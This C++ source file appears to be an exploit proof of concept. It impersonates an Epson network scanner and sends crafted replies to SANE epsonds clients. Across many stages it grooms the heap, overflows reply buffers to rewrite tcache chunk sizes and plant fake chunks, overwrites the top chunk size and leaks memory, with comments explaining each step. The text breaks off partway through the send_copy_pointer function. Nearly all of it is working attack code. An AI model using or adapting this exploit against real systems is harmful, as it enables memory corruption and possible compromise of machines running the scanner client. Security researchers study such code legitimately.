#include <string.h>
#include <assert.h>
#include <arpa/inet.h>
#include <map>
#include "utils.hpp"
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>

// This number is the buffer size (in bytes) that we use in the "large_mmap"
// stage: it is advertised as the `more` length when acceptCount_ ==
// A_large_mmap, and it is the size of the zero-filled payload that
// send_mmap transmits.
// The exact value doesn't matter too much: it just needs to be more than
// the amount of memory that we are going to use during the rest of
// the exploit, so that we don't accidentally hit invalid memory when
// we allocate from the top chunk.
static const uint32_t large_mmap_size = 0x1ffd0;

// Keep track of the set of client ip addresses that have sent us
// an Epson discover message. This is so that we can count the
// number of times that we have accepted a TCP connection from
// each client so far. (The exploit involves tricking the client
// into connecting to us multiple times.) We reset the counter
// when we receive a new discover message.
//
// Both public methods ignore addresses that are null or shorter than
// a sockaddr_in, so a malformed peer address can never reach the
// assertion (or the out-of-bounds read) in Key.
class EpsonClientSet {
  // The key of the std::map is the IP address of the client.
  // NOTE(review): the address is always read through sockaddr_in, i.e.
  // it is treated as IPv4 regardless of sa_family -- confirm that the
  // listening sockets are AF_INET.
  class Key {
    in_addr peer_addr_;

  public:
    // Precondition: peer_addr points to at least sizeof(sockaddr_in)
    // bytes. Callers inside EpsonClientSet check this before
    // constructing a Key. Logs the address without a trailing newline;
    // the caller terminates the log line.
    Key(const sockaddr* peer_addr, socklen_t peer_addr_len) {
      assert(peer_addr_len >= sizeof(sockaddr_in));
      peer_addr_ = reinterpret_cast<const sockaddr_in*>(peer_addr)->sin_addr;
      printf("Key: %s", inet_ntoa(peer_addr_));
    }

    // Strict weak ordering over the raw bytes of the address.
    bool operator<(const Key& that) const {
      return memcmp(&peer_addr_, &that.peer_addr_, sizeof(in_addr)) < 0;
    }
  };

  // Number of TCP connections accepted so far, per client address.
  std::map<Key, size_t> counts_;

  // True if the address is large enough to be read as a sockaddr_in.
  static bool isUsableAddr(const sockaddr* peer_addr, socklen_t peer_addr_len) {
    return peer_addr != nullptr && peer_addr_len >= sizeof(sockaddr_in);
  }

public:
  // Set the connection counter of this client to zero, creating the
  // entry if it does not exist yet. Unusable addresses are ignored.
  void resetClient(const sockaddr* peer_addr, socklen_t peer_addr_len) {
    printf("resetClient ");
    if (!isUsableAddr(peer_addr, peer_addr_len)) {
      printf("ignored: address too short\n");
      return;
    }
    counts_[Key(peer_addr, peer_addr_len)] = 0;
    printf("\n");
  }

  // Increment the connection counter of this client and return the
  // value that it had *before* the increment. A client that has never
  // been seen starts at zero (so the first call returns 0 and stores 1).
  // Unusable addresses are not tracked; 0 is returned for them.
  size_t incrClient(const sockaddr* peer_addr, socklen_t peer_addr_len) {
    printf("incrClient ");
    if (!isUsableAddr(peer_addr, peer_addr_len)) {
      printf("ignored: address too short\n");
      return 0;
    }
    // Single lookup: emplace inserts a zero counter only if the key is
    // absent, and returns the existing entry otherwise.
    const auto inserted =
      counts_.emplace(Key(peer_addr, peer_addr_len), size_t(0));
    const size_t n = (inserted.first->second)++;
    if (inserted.second) {
      printf(" key not found, starting new counter\n");
    } else {
      printf(" count: %zu\n", n);
    }
    return n;
  }
};

// The exact 15 bytes of the UDP message that EpsonHandlerUDP::receive
// treats as an Epson discover message. The literal spells out 14 bytes;
// the 15th is the string's terminating NUL, which is part of the
// comparison because sizeof() is used as the message length.
static const char epsonp_discover[15] = "EPSONP\x00\xff\x00\x00\x00\x00\x00\x00";

// The 76 byte datagram that EpsonHandlerUDP::receive sends back (via
// replyto) after it has seen a discover message.
static const char epsonp_response[76] =
  "EPSON                                                                      ";

class EpsonHandlerUDP : public RecvHandlerUDP {
  EpsonClientSet& epsonClientSet_;

public:
  EpsonHandlerUDP(EpsonClientSet& epsonClientSet) :
    epsonClientSet_(epsonClientSet)
  {}

  virtual ~EpsonHandlerUDP() {}

  int receive(
    const uint8_t* buf, ssize_t len,
    SocketHandlerUDP& sock,
    const sockaddr* peer_addr, socklen_t peer_addr_len
  ) override {
    print_addr(peer_addr, peer_addr_len);
    printf("\n");
    if (len != sizeof(epsonp_discover)) {
      // We're not interested in this message.
      return 0;
    }
    if (memcmp(buf, epsonp_discover, sizeof(epsonp_discover)) != 0) {
      // We're not interested in this message.
      return 0;
    }

    // This is the first contact from this client, so reset/create
    // its counter.
    epsonClientSet_.resetClient(peer_addr, peer_addr_len);

    printf("EPSON discover\n");
    for (size_t i = 0; i < 128; i++) {
      if (sock.replyto(
            epsonp_response, sizeof(epsonp_response),
            peer_addr,
            peer_addr_len
          ) < 0) {
        printf("failed to send response.\n");
      }
    }

    return 0;
  }
};

class EpsonHandlerTCP : public RecvHandlerTCP {
public:
  // Milestones of acceptCount_ (the number of TCP connections accepted
  // from the client so far). eds_send compares acceptCount_ against
  // these values to decide which stage of the exploit to run.
  enum AcceptState : size_t {
    // Counts 0..63: heap grooming (every count below A_create_tcache_blocks).
    A_groom_heap = 0,
    A_create_tcache_blocks = 64,
    A_reindex_tcache_blocks, // 65
    A_overwrite_tcache_blocks, // 66
    // First of 15 consecutive counts (67..81) which eds_send handles in
    // groups of three: create, reindex, resize.
    A_create_extra_tcache_block00, // 67
    A_large_mmap = A_create_extra_tcache_block00 + 15, // 82
    A_create_barrier1, // 83
    A_resize_buffer1, // 84
    A_overwrite_top, // 85
    A_subtract_top, // 86
    A_copy_pointer // 87
  };

private:
  // Which part of the client's message stream we are waiting for next.
  // The current value is kept in state_.
  enum HdrState {
    H_wait_hdr, // Waiting for the 12 byte header
    H_wait_extra_hdr, // Waiting for the extra 8 header bytes
    H_wait_payload, // Waiting for the message payload
    H_wait_moreinfo, // Waiting for the request for more info
    H_wait_stackdump // Waiting for the stack dump after triggering the info leak.
  };

  // What to do when we receive the H_wait_moreinfo message.
  enum MoreinfoState {
    // Respond with a message which causes memory to be leaked.
    M_leakmem,

    // Allocate some tcache-sized blocks from the top chunk,
    // then free them, so that they go in the tcache.
    M_create_tcache_blocks,
    M_reindex_tcache_blocks,
    M_overwrite_tcache_blocks,
    M_create_extra_tcache_block,
    M_reindex_extra_tcache_block,
    M_resize_extra_tcache_block,

    // Respond with a message which causes a large amount of memory to
    // be allocated and then freed, thereby mmap-ing more memory.
    M_large_mmap,

    // Respond with a message which causes decode_before to leak
    // some memory. We use this to split the heap, because pbuf (epsonds-cmd.c:187)
    // is allocated at a lower address and is subsequently freed, leaving a gap
    // in the heap.
    M_create_barrier,

    // We use a buffer overflow to enlarge the PRD buffer before it is freed.
    M_resize_buffer,

    // We allocate a PRD buffer. Due to previous heap massage, this will
    // overwrite the size of the top chunk.
    M_overwrite_top,

    M_subtract_top,

    M_copy_pointer,

    // Leak a 64 byte allocation.
    M_leakmem64,
    M_leakmem64_nrdBUSY
  };

  // The number of times that we have accepted a TCP connection
  // from this client. (The exploit involves tricking the client
  // into connecting to us multiple times.)
  const size_t acceptCount_;

  // Only used when acceptCount_ == A_copy_pointer. We need to go round
  // the loop in esci2_info a few times to leak all the 64 byte blocks in
  // the tcache. This counter keeps track of the number of loop iterations.
  size_t copy_pointer_info_count_;

  // What we are waiting to receive next from the client.
  HdrState state_;
  // Which reply to send when the H_wait_moreinfo message arrives.
  MoreinfoState moreinfo_state_;
  // NOTE(review): presumably the command code parsed from the most recent
  // header; not used in the visible part of the file -- confirm.
  uint16_t cmd_;
  // Size of the request payload that eds_send matches against
  // (2 for "\x1CX", 12 for "INFOx0000000").
  uint32_t buf_size_;
  // Reply length that eds_send matches against (1 or 64); several send_*
  // methods also write it into the reply header.
  uint32_t reply_len_;

  // Send the acknowledgement reply: a 12 byte "IS" header followed by a
  // single payload byte with value 6 (ASCII ACK). Afterwards go back to
  // waiting for a header.
  //
  // Always returns 12, even when the send fails (a failure is only logged).
  // NOTE(review): the 12 is presumably the number of bytes the caller
  // should wait for next (one header) -- confirm against the caller.
  ssize_t send_ack(SocketHandlerTCP& sock) {
    const char ack_packet[13] = {
      'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0, // header
      6                                         // payload
    };
    const bool sent_ok = sock.reply(ack_packet, sizeof(ack_packet)) >= 0;
    if (!sent_ok) {
      printf("send failed.\n");
    }

    state_ = H_wait_hdr;
    return 12;
  }

  // Send a 76 byte reply (12 byte "IS" header announcing 64 bytes, then
  // "INFOx" followed by a VER command) in a single write. A send failure
  // is only logged.
  void send_leakmem(SocketHandlerTCP& sock) {
    // Trigger the `wanted > size` case (epsonds-net.c:149), which leaks
    // the reply buffer because we sent a shorter reply than expected.
    const char header[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0};
    const size_t info_offset = sizeof(header);
    const size_t cmd_offset = 17;

    char reply[76];
    memset(reply, 0, sizeof(reply));
    memcpy(reply, header, sizeof(header));
    memcpy(&reply[info_offset], "INFOx", 5);

    // The VER command triggers a 0xf8 byte malloc/free pair. This
    // reserves some space for the next allocation of `struct
    // epsonds_device` at epsonds.c:349. Without it, that allocation could
    // split the block that was previously used for `struct
    // epsonds_scanner` (epsonds.c:303), which would ruin our heap grooming
    // strategy.
    snprintf(
      &reply[cmd_offset], sizeof(reply) - cmd_offset,
      "#VERh0f7kevwozere#---"
    );

    const bool sent_ok = sock.reply(reply, sizeof(reply)) >= 0;
    if (!sent_ok) {
      printf("send failed.\n");
    }
  }

  // Send a 12 byte "IS" header whose length field (bytes 6..9, big
  // endian) is reply_len_, followed by a 0xa30 byte zero-padded payload
  // which starts with two VER commands. Send failures are only logged.
  void send_create_tcache_blocks(SocketHandlerTCP& sock) {
    printf("send_create_tcache_blocks %x\n", reply_len_);
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    // Use memcpy for the length field: &reply[6] is not guaranteed to be
    // suitably aligned for a uint32_t store.
    const uint32_t reply_len_be = htonl(reply_len_);
    memcpy(&reply[6], &reply_len_be, sizeof(reply_len_be));
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // Send the requested amount of data.
    // Include two VER commands, each of which will allocate some
    // memory from the top chunk and then return it to the tcache.
    char buf[0xa30];
    memset(buf, 0, sizeof(buf));
    snprintf(buf, sizeof(buf), "#VERh3cfkevwozere#VERh3dfkevwozere#---");

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %zd bytes\n", wr);
    }
  }

  // Send a 12 byte "IS" header whose length field (bytes 6..9, big
  // endian) is overflow_len, followed by an overflow_len byte payload:
  // a VER command at the start and 64 bit values at fixed offsets from
  // 0x510 onwards. Send failures are only logged.
  void send_reindex_tcache_blocks(SocketHandlerTCP& sock) {
    printf("send_reindex_tcache_blocks %x\n", reply_len_);
    const uint32_t overflow_len = 0x510 + 0x400 + 0x30;
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    // Use memcpy for the length field: &reply[6] is not guaranteed to be
    // suitably aligned for a uint32_t store.
    const uint32_t overflow_len_be = htonl(overflow_len);
    memcpy(&reply[6], &overflow_len_be, sizeof(overflow_len_be));
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // The reply includes a VER command so that the first tcache
    // block will get allocated and freed. We use the buffer
    // overflow to change its size, so that it will be returned to
    // a different tcache index.
    char buf[overflow_len];
    memset(buf, 0, sizeof(buf));
    // Store a 64 bit value (native byte order) at a byte offset of buf
    // without assuming any alignment of the char buffer.
    const auto put64 = [&buf](size_t offset, uint64_t value) {
      memcpy(&buf[offset], &value, sizeof(value));
    };
    snprintf(buf, sizeof(buf), "#VERh3cfkevwozere#---");
    put64(0x510, 0x520); // Preserve what was there before.
    put64(0x510 + 0x8, 0x405); // New size (was 0x3e5)
    put64(0x510 + 0x3e0, 0); // Preserve what was there before.
    put64(0x510 + 0x3e8, 0x3f5); // Preserve what was there before.
    put64(0x510 + 0x400, 0); // Terminate new block
    put64(0x510 + 0x408, 0x25); // Fake next chunk
    put64(0x510 + 0x400 + 0x20, 0x20); // Fake next chunk
    put64(0x510 + 0x400 + 0x28, 0x25); // Fake next chunk

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %zd bytes\n", wr);
    }
  }

  // Send a 12 byte "IS" header whose length field (bytes 6..9, big
  // endian) is overflow_len, followed by an overflow_len byte payload
  // carrying 64 bit values at fixed offsets from 0x510 onwards.
  // Send failures are only logged.
  void send_overwrite_tcache_blocks(SocketHandlerTCP& sock) {
    printf("send_overwrite_tcache_blocks %x\n", reply_len_);
    const uint32_t overflow_len = 0x510 + 0x3e0 + 0x80;
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    // Use memcpy for the length field: &reply[6] is not guaranteed to be
    // suitably aligned for a uint32_t store.
    const uint32_t overflow_len_be = htonl(overflow_len);
    memcpy(&reply[6], &overflow_len_be, sizeof(overflow_len_be));
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // The two tcache blocks are now stored at their desired tcache
    // indices. We're now going to overwrite them so that they look like
    // they are 0x40 byte allocations. Later, we will be able to allocate
    // them based on their old size, but they'll be returned as 0x40 byte
    // allocations.
    char buf[overflow_len];
    memset(buf, 0, sizeof(buf));
    // Store a 64 bit value (native byte order) at a byte offset of buf
    // without assuming any alignment of the char buffer.
    const auto put64 = [&buf](size_t offset, uint64_t value) {
      memcpy(&buf[offset], &value, sizeof(value));
    };
    snprintf(buf, sizeof(buf), "#---");
    put64(0x510, 0x520); // Preserve what was there before.
    put64(0x510 + 0x8, 0x55); // New size (was 0x405)
    put64(0x510 + 0x50, 0x50); // New size
    put64(0x510 + 0x58, 0x25); // Fake chunk
    put64(0x510 + 0x70, 0x20); // Fake chunk
    put64(0x510 + 0x78, 0x25); // Fake chunk
    put64(0x510 + 0x3e0, 0); // Preserve what was there before.
    put64(0x510 + 0x3e8, 0x55); // New size (was 0x3f5)
    put64(0x510 + 0x3e0 + 0x50, 0x50); // New size
    put64(0x510 + 0x3e0 + 0x58, 0x25); // Fake chunk
    put64(0x510 + 0x3e0 + 0x70, 0x20); // Fake chunk
    put64(0x510 + 0x3e0 + 0x78, 0x25); // Fake chunk

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %zd bytes\n", wr);
    }
  }

  // Send a 12 byte "IS" header whose length field (bytes 6..9, big
  // endian) is reply_len_, followed by a 0xa30 byte zero-padded payload
  // which starts with a VER command and carries two 64 bit values.
  // Send failures are only logged.
  void send_create_extra_tcache_block(SocketHandlerTCP& sock) {
    printf("send_create_extra_tcache_block %x\n", reply_len_);
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    // Use memcpy for the length field: &reply[6] is not guaranteed to be
    // suitably aligned for a uint32_t store.
    const uint32_t reply_len_be = htonl(reply_len_);
    memcpy(&reply[6], &reply_len_be, sizeof(reply_len_be));
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // Allocate and free 0x400 bytes. It will go in the tcache.
    char buf[0xa30];
    memset(buf, 0, sizeof(buf));
    // Store a 64 bit value (native byte order) at a byte offset of buf
    // without assuming any alignment of the char buffer.
    const auto put64 = [&buf](size_t offset, uint64_t value) {
      memcpy(&buf[offset], &value, sizeof(value));
    };
    snprintf(buf, sizeof(buf), "#VERh3ff#---");
    // Prepare the end of the chunk so that we can resize it to 0x3e0 on
    // the next iteration.
    put64(8 + 0x3d0, 0x3e0);
    put64(8 + 0x3d8, 0x35); // Fake chunk (covering gap to top chunk)

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %zd bytes\n", wr);
    }
  }

  // Send a 12 byte "IS" header whose length field (bytes 6..9, big
  // endian) is overflow_len, followed by an overflow_len byte payload:
  // a VER command at the start and 64 bit values at fixed offsets.
  // Send failures are only logged.
  void send_reindex_extra_tcache_block(SocketHandlerTCP& sock) {
    printf("send_reindex_extra_tcache_block %x\n", reply_len_);
    const uint32_t overflow_len = 0x510 + 0x10;
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    // Use memcpy for the length field: &reply[6] is not guaranteed to be
    // suitably aligned for a uint32_t store.
    const uint32_t overflow_len_be = htonl(overflow_len);
    memcpy(&reply[6], &overflow_len_be, sizeof(overflow_len_be));
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // Allocate and free the chunk that we created during the previous
    // iteration. We have used the buffer overflow to modify its header
    // so that it now looks like a chunk of size 0x3e0. So it will be
    // returned to a different tcache index.
    char buf[overflow_len];
    memset(buf, 0, sizeof(buf));
    // Store a 64 bit value (native byte order) at a byte offset of buf
    // without assuming any alignment of the char buffer.
    const auto put64 = [&buf](size_t offset, uint64_t value) {
      memcpy(&buf[offset], &value, sizeof(value));
    };
    snprintf(buf, sizeof(buf), "#VERh3ff#---");
    // Prepare the end of the chunk so that we can resize it to 0x50 on
    // the next iteration.
    put64(8 + 0x40, 0x50);
    put64(8 + 0x48, 0x25); // Fake chunk
    put64(8 + 0x60, 0x20); // Fake chunk
    put64(8 + 0x68, 0x25); // Fake chunk

    // Use buffer overflow to change the size of the buffer.
    put64(0x510, 0x520); // Preserve what was there before.
    put64(0x510 + 0x8, 0x3e5); // New size (was 0x415)

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %zd bytes\n", wr);
    }
  }

  // Send a 12 byte "IS" header whose length field (bytes 6..9, big
  // endian) is overflow_len, followed by an overflow_len byte payload
  // which carries two 64 bit values at offset 0x510.
  // Send failures are only logged.
  void send_resize_extra_tcache_block(SocketHandlerTCP& sock) {
    // Log under this method's own name (it used to print the name of
    // send_reindex_extra_tcache_block, which made the two stages
    // indistinguishable in the output).
    printf("send_resize_extra_tcache_block %x\n", reply_len_);
    const uint32_t overflow_len = 0x510 + 0x10;
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    // Use memcpy for the length field: &reply[6] is not guaranteed to be
    // suitably aligned for a uint32_t store.
    const uint32_t overflow_len_be = htonl(overflow_len);
    memcpy(&reply[6], &overflow_len_be, sizeof(overflow_len_be));
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // Overwrite the header of the chunk so that its size is 0x50.
    // It is currently stored in the tcache for chunks of size 0x3e0,
    // so it will sit there happily until we are ready to use it
    // later in the exploit. At that time, we will be able to use
    // the VERh3cf command to allocate and free the chunk, and it
    // will be returned as a chunk of size 0x50.
    char buf[overflow_len];
    memset(buf, 0, sizeof(buf));
    // Store a 64 bit value (native byte order) at a byte offset of buf
    // without assuming any alignment of the char buffer.
    const auto put64 = [&buf](size_t offset, uint64_t value) {
      memcpy(&buf[offset], &value, sizeof(value));
    };
    snprintf(buf, sizeof(buf), "#---");
    // Use buffer overflow to change the size of the buffer.
    put64(0x510, 0x520); // Preserve what was there before.
    put64(0x510 + 0x8, 0x55); // New size (was 0x3e5)

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %zd bytes\n", wr);
    }
  }

  // Send a 12 byte "IS" header whose length field (bytes 6..9, big
  // endian) is reply_len_, followed by large_mmap_size zero bytes.
  // Send failures are only logged.
  void send_mmap(SocketHandlerTCP& sock) {
    printf("send_mmap %x\n", reply_len_);
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    // Use memcpy for the length field: &reply[6] is not guaranteed to be
    // suitably aligned for a uint32_t store.
    const uint32_t reply_len_be = htonl(reply_len_);
    memcpy(&reply[6], &reply_len_be, sizeof(reply_len_be));
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    char buf[large_mmap_size];
    memset(buf, 0, sizeof(buf));

    // Report the outcome of the payload send like the other send_*
    // methods do, instead of silently dropping a failure.
    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %zd bytes\n", wr);
    }
  }

  // Send a 12 byte "IS" header whose length field (bytes 6..9, big
  // endian) is reply_len_, followed by a 0xa30 byte zero-padded payload
  // which starts with a PRD command. Send failures are only logged.
  void send_create_barrier(SocketHandlerTCP& sock) {
    printf("send_create_barrier %x\n", reply_len_);
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    // Use memcpy for the length field: &reply[6] is not guaranteed to be
    // suitably aligned for a uint32_t store.
    const uint32_t reply_len_be = htonl(reply_len_);
    memcpy(&reply[6], &reply_len_be, sizeof(reply_len_be));
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // Send the requested amount of data.
    // Include a PRD instruction which tells decode_buffer to
    // allocate 0x510 bytes.
    char buf[0xa30];
    memset(buf, 0, sizeof(buf));
    snprintf(buf, sizeof(buf), "#PRDh50fkevwozere#---");

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %zd bytes\n", wr);
    }
  }

  // Send a 12 byte "IS" header whose length field (bytes 6..9, big
  // endian) is overflow_len, followed by an overflow_len byte payload:
  // a PRD command at the start and 64 bit values at fixed offsets from
  // 0x510 onwards. Send failures are only logged.
  void send_resize_buffer(SocketHandlerTCP& sock) {
    printf("send_resize_buffer %x\n", reply_len_);
    const uint32_t overflow_len = 0x510 + 0x520 + 0x1440 + 0x30;
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    // Use memcpy for the length field: &reply[6] is not guaranteed to be
    // suitably aligned for a uint32_t store.
    const uint32_t overflow_len_be = htonl(overflow_len);
    memcpy(&reply[6], &overflow_len_be, sizeof(overflow_len_be));
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // Send more data than requested. We're going to overwrite
    // the PRD buffer to make it look bigger. We also include
    // a new PRD instruction in the response which will allocate
    // a smaller buffer in the bottom half of the new large block.
    // That PRD allocation is leaked which means that we now have
    // a free buffer that overlaps with the top chunk.
    char buf[overflow_len];
    memset(buf, 0, sizeof(buf));
    // Store a 64 bit value (native byte order) at a byte offset of buf
    // without assuming any alignment of the char buffer.
    const auto put64 = [&buf](size_t offset, uint64_t value) {
      memcpy(&buf[offset], &value, sizeof(value));
    };
    snprintf(buf, sizeof(buf), "#PRDh9dfkevwozere#---");
    // Expected reply buffer is 0x510 bytes.
    // Barrier is 0x510 bytes.
    // Old PRD buffer is 0xa60 bytes
    // New PRD size is 0x1430 bytes
    put64(0x510, 0x520); // Preserve what was there before.
    put64(0x510 + 0x8, 0x525); // Preserve what was there before.
    put64(0x510 + 0x520, 0); // Preserve what was there before.
    put64(0x510 + 0x520 + 0x8, 0x1445); // New size (was 0xa55)
    put64(0x510 + 0x520 + 0xa70 + 0x8, 0x10001); // Overwrite top chunk size
    put64(0x510 + 0x520 + 0x1440, 0x1440); // New size
    put64(0x510 + 0x520 + 0x1440 + 0x8, 0x25); // Fake next chunk
    put64(0x510 + 0x520 + 0x1440 + 0x20, 0x20); // Fake next chunk
    put64(0x510 + 0x520 + 0x1440 + 0x28, 0x25); // Fake next chunk

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %zd bytes\n", wr);
    }
  }

  // Send a 12 byte "IS" header whose length field (bytes 6..9, big
  // endian) is overflow_len, followed by an overflow_len byte payload:
  // a PRD command at the start, 64 bit values at fixed offsets from
  // 0x510 onwards, and a final single byte of value 1.
  // Send failures are only logged.
  void send_overwrite_top(SocketHandlerTCP& sock) {
    printf("send_overwrite_top %x\n", reply_len_);
    const uint32_t overflow_len = 0x510 + 0x520 + 0xa70 + 0x8 + 0x1;
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    // Use memcpy for the length field: &reply[6] is not guaranteed to be
    // suitably aligned for a uint32_t store.
    const uint32_t overflow_len_be = htonl(overflow_len);
    memcpy(&reply[6], &overflow_len_be, sizeof(overflow_len_be));
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // Send more data than requested. We're going to overwrite the bottom
    // byte of the size of the top chunk with 0x1 to make it valid, so that
    // we can start allocating memory from the top chunk. We also include a
    // new PRD instruction in the response to leak one of the 0x510 blocks
    // before the barrier, because we don't need it anymore.
    char buf[overflow_len];
    memset(buf, 0, sizeof(buf));
    // Store a 64 bit value (native byte order) at a byte offset of buf
    // without assuming any alignment of the char buffer.
    const auto put64 = [&buf](size_t offset, uint64_t value) {
      memcpy(&buf[offset], &value, sizeof(value));
    };
    snprintf(buf, sizeof(buf), "#PRDh50fkevwozere#---");
    // Expected reply buffer is 0x510 bytes.
    // Barrier is 0x510 bytes.
    // Old PRD buffer is 0xa60 bytes
    // New PRD size is 0x1430 bytes
    put64(0x510, 0x520); // Preserve what was there before.
    put64(0x510 + 0x8, 0x525); // Preserve what was there before.
    put64(0x510 + 0x520, 0); // Preserve what was there before.
    put64(0x510 + 0x520 + 0x8, 0x9f5); // Preserve what was there before.

    // Overwrite the old PRD block so that it looks like a 64 byte allocation.
    // This will be freed and added to the tcache. We need the tcache to be
    // fully loaded for the rest of the exploit to work. It's probably already
    // full but this is a convenient opportunity to free another chunk so we might
    // as well take it.
    put64(0x510 + 0x520 + 0x9f0, 0); // Preserve what was there before.
    put64(0x510 + 0x520 + 0x9f0 + 0x8, 0x55); // 64 byte chunk
    put64(0x510 + 0x520 + 0x9f0 + 0x50, 0x50); // New size
    put64(0x510 + 0x520 + 0x9f0 + 0x58, 0x25); // Fake next chunk
    put64(0x510 + 0x520 + 0x9f0 + 0x70, 0x20); // Fake next chunk
    put64(0x510 + 0x520 + 0x9f0 + 0x78, 0x25); // Fake next chunk

    buf[0x510 + 0x520 + 0xa70 + 0x8] = 0x1; // Overwrite bottom byte of top chunk size.

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %zd bytes\n", wr);
    }
  }

  // Send a 76 byte reply (12 byte "IS" header announcing 64 bytes, then
  // "INFOx" followed by a VER command) in a single write. A send failure
  // is only logged.
  void send_subtract_top(SocketHandlerTCP& sock) {
    // Trigger the `wanted > size` case (epsonds-net.c:149), which leaks
    // the reply buffer because we sent a shorter reply than expected.
    const char header[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0};
    const size_t info_offset = sizeof(header);
    const size_t cmd_offset = 17;

    char reply[76];
    memset(reply, 0, sizeof(reply));
    memcpy(reply, header, sizeof(header));
    memcpy(&reply[info_offset], "INFOx", 5);

    // We have previously overwritten the size of the top chunk with a
    // stack address. Now we are subtracting an offset from that stack
    // address by allocating a large block of memory. We leak the reply
    // buffer so that the top chunk stays at the position that we just
    // moved it to. (Also because, if the reply buffer were freed, the
    // malloc implementation would notice that the size of the top chunk
    // is invalid and crash.)
    //
    // We include a VER command to allocate 0x400 bytes. There are currently
    // no gaps in memory, so this will be allocated immediately after the
    // reply buffer. But when we free it, it will be added to the tcache.
    snprintf(
      &reply[cmd_offset], sizeof(reply) - cmd_offset,
      "#VERh3ffkevwozere#---"
    );

    const bool sent_ok = sock.reply(reply, sizeof(reply)) >= 0;
    if (!sent_ok) {
      printf("send failed.\n");
    }
  }

  // Build the 12 byte "IS" header (length field 0x400, big endian, at
  // bytes 6..9) and a 0x400 byte payload in one buffer and send them in
  // a single write. The payload is a sequence of commands interleaved
  // with 64 bit values at fixed offsets. A send failure is only logged.
  //
  // The statements below are order-sensitive: each sprintf also writes a
  // terminating NUL, which the following write at the next offset is
  // expected to overwrite.
  void send_copy_pointer(SocketHandlerTCP& sock) {
    printf("send_copy_pointer %x\n", reply_len_);
    const uint32_t len = 0x400;
    char header[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    // Use memcpy for the length field: &header[6] is not guaranteed to be
    // suitably aligned for a uint32_t store.
    const uint32_t len_be = htonl(len);
    memcpy(&header[6], &len_be, sizeof(len_be));
    char buf[sizeof(header) + len];
    memset(buf, 0, sizeof(buf));
    memcpy(buf, header, sizeof(header));

    // Store a 64 bit value (native byte order) at a byte offset of buf.
    // The offsets used below are odd multiples of nothing in particular
    // (e.g. 12 + 41 + 0x40), so a direct uint64_t store would be
    // misaligned.
    const auto put64 = [&buf](size_t offset, uint64_t value) {
      memcpy(&buf[offset], &value, sizeof(value));
    };

    sprintf(
      &buf[sizeof(header)],
      "#VERh3df#AAAAAAAAAAAAAAAAAAAAAAAA#VERh3ef#AAA"
    );
    put64(sizeof(header) + 8 + 0x40, 0x50);
    put64(sizeof(header) + 8 + 0x48, 0x25);
    put64(sizeof(header) + 8 + 0x60, 0x20);
    put64(sizeof(header) + 8 + 0x68, 0x25);
    put64(sizeof(header) + 41 + 0x40, 0x50);
    put64(sizeof(header) + 41 + 0x48, 0x25);
    put64(sizeof(header) + 41 + 0x60, 0x20);
    put64(sizeof(header) + 41 + 0x68, 0x25);

    // Add "nrdBUSY" so that we repeat the loop in esci2_info.
    sprintf(
      &buf[sizeof(header) + 41 + 0x70],
      "#nrdBUSY"
    );

